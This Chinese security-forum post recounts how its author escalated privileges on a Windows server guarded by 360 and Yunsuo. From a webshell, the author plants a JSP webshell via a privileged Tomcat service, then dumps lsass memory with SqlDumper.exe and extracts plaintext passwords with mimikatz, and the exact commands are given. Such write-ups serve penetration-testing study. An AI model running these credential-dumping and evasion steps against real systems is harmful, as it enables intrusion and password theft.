安全矩阵

 找回密码
 立即注册
搜索
查看: 3455|回复: 1

绕过360安全套装+云锁提权案例

[复制链接]

180

主题

231

帖子

1180

积分

金牌会员

Rank: 6Rank: 6

积分
1180
发表于 2021-10-20 14:14:22 | 显示全部楼层 |阅读模式
原文链接:绕过360安全套装+云锁提权案例

开局一个Webshell,先进行简单的信息搜集,查看当前权限,正常的iis权限



查看版本
  1. wmic OS get Caption,CSDVersion,OSArchitecture,Version
复制代码

查看软件
  1. wmic product get name,version
复制代码

因为提前说了有360和云锁。




360全套带云锁,net、net1、netstat不能执行。sql server数据库,但是因为站酷分离,而且cmd被删除,不能执行命令,懒得去突破了。

而且云锁有个最大的特点就是上传的exe不能执行,加上360全套。传上去的基本不行,传微软自带的net也没用,直接秒没。  

因为不能穿exe来提权,所以只能先扫下本地有什么端口。webshell+nmap全端口。


开了3389和1433还有3306,但是1433死活找不到密码,碰撞了几个也不行。



发现有好几个tomcat端口,我们很多人应该知道tomcat继承的是system权限或者administrator权限。既然不能用exe提权,我们来用自带的tomcat。  

nmap已经扫描出来端口,我们只要找到conf/server.xml文件对应下端口就可以了。




直接去上传个jsp马就行了。





就算是系统权限也是不能执行net net1等等,exe也一样。

所以试了bat导出注册表sam失败了。hta不能执行,powershell失败。所以用了冰蝎自带的meterpreter.  




说下sql server自带的工具 SqlDumper.exe是从SQL Server安装目录下提取出来的,功能和Procdump相似,并且也是微软出品的,体积远小于Procdump,也具备一定的免杀功能。

SqlDumper.exe默认存放在C:⧵Program Files⧵Microsoft SQLServer⧵number⧵Shared,number代表SQL Server的版本,参考如下:


  1. 可能存在的位置:
  2. C:\Program Files\Microsoft SQL Server\100\Shared\SqlDumper.exe
  3. C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\SQLDumper.exe
  4. C:\Program Files (x86)\Microsoft SQL Server\100\Shared\SqlDumper.exe
复制代码
SqlDumper.exe利用方式
  1. 查看lsass.exe的pid
  2. tasklist /svc |findstr lsass.exe

  3. 584是lsass.exe的pid
  4. "C:\Program Files\Microsoft SQL Server\100\Shared\SqlDumper.exe" 584 0 0x01100
复制代码






利用webshell把SQLDmpr0001.mdmp下载下来,然后使用mimikatz法国神器得到目标主机明文密码。
  1. mimikatz.exe "sekurlsa::minidump SQLDmpr0001.mdmp" "sekurlsa::logonPasswords full" "exit">1.txt
复制代码



可以使用query user命令看下管理员在不在, 我们直接登入进去。  



结束。




本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

180

主题

231

帖子

1180

积分

金牌会员

Rank: 6Rank: 6

积分
1180
 楼主| 发表于 2021-10-20 14:18:12 | 显示全部楼层
在360等安全套餐的限制下拿到高级权限的各种姿势..
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-9-8 12:18 , Processed in 0.015423 second(s), 20 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表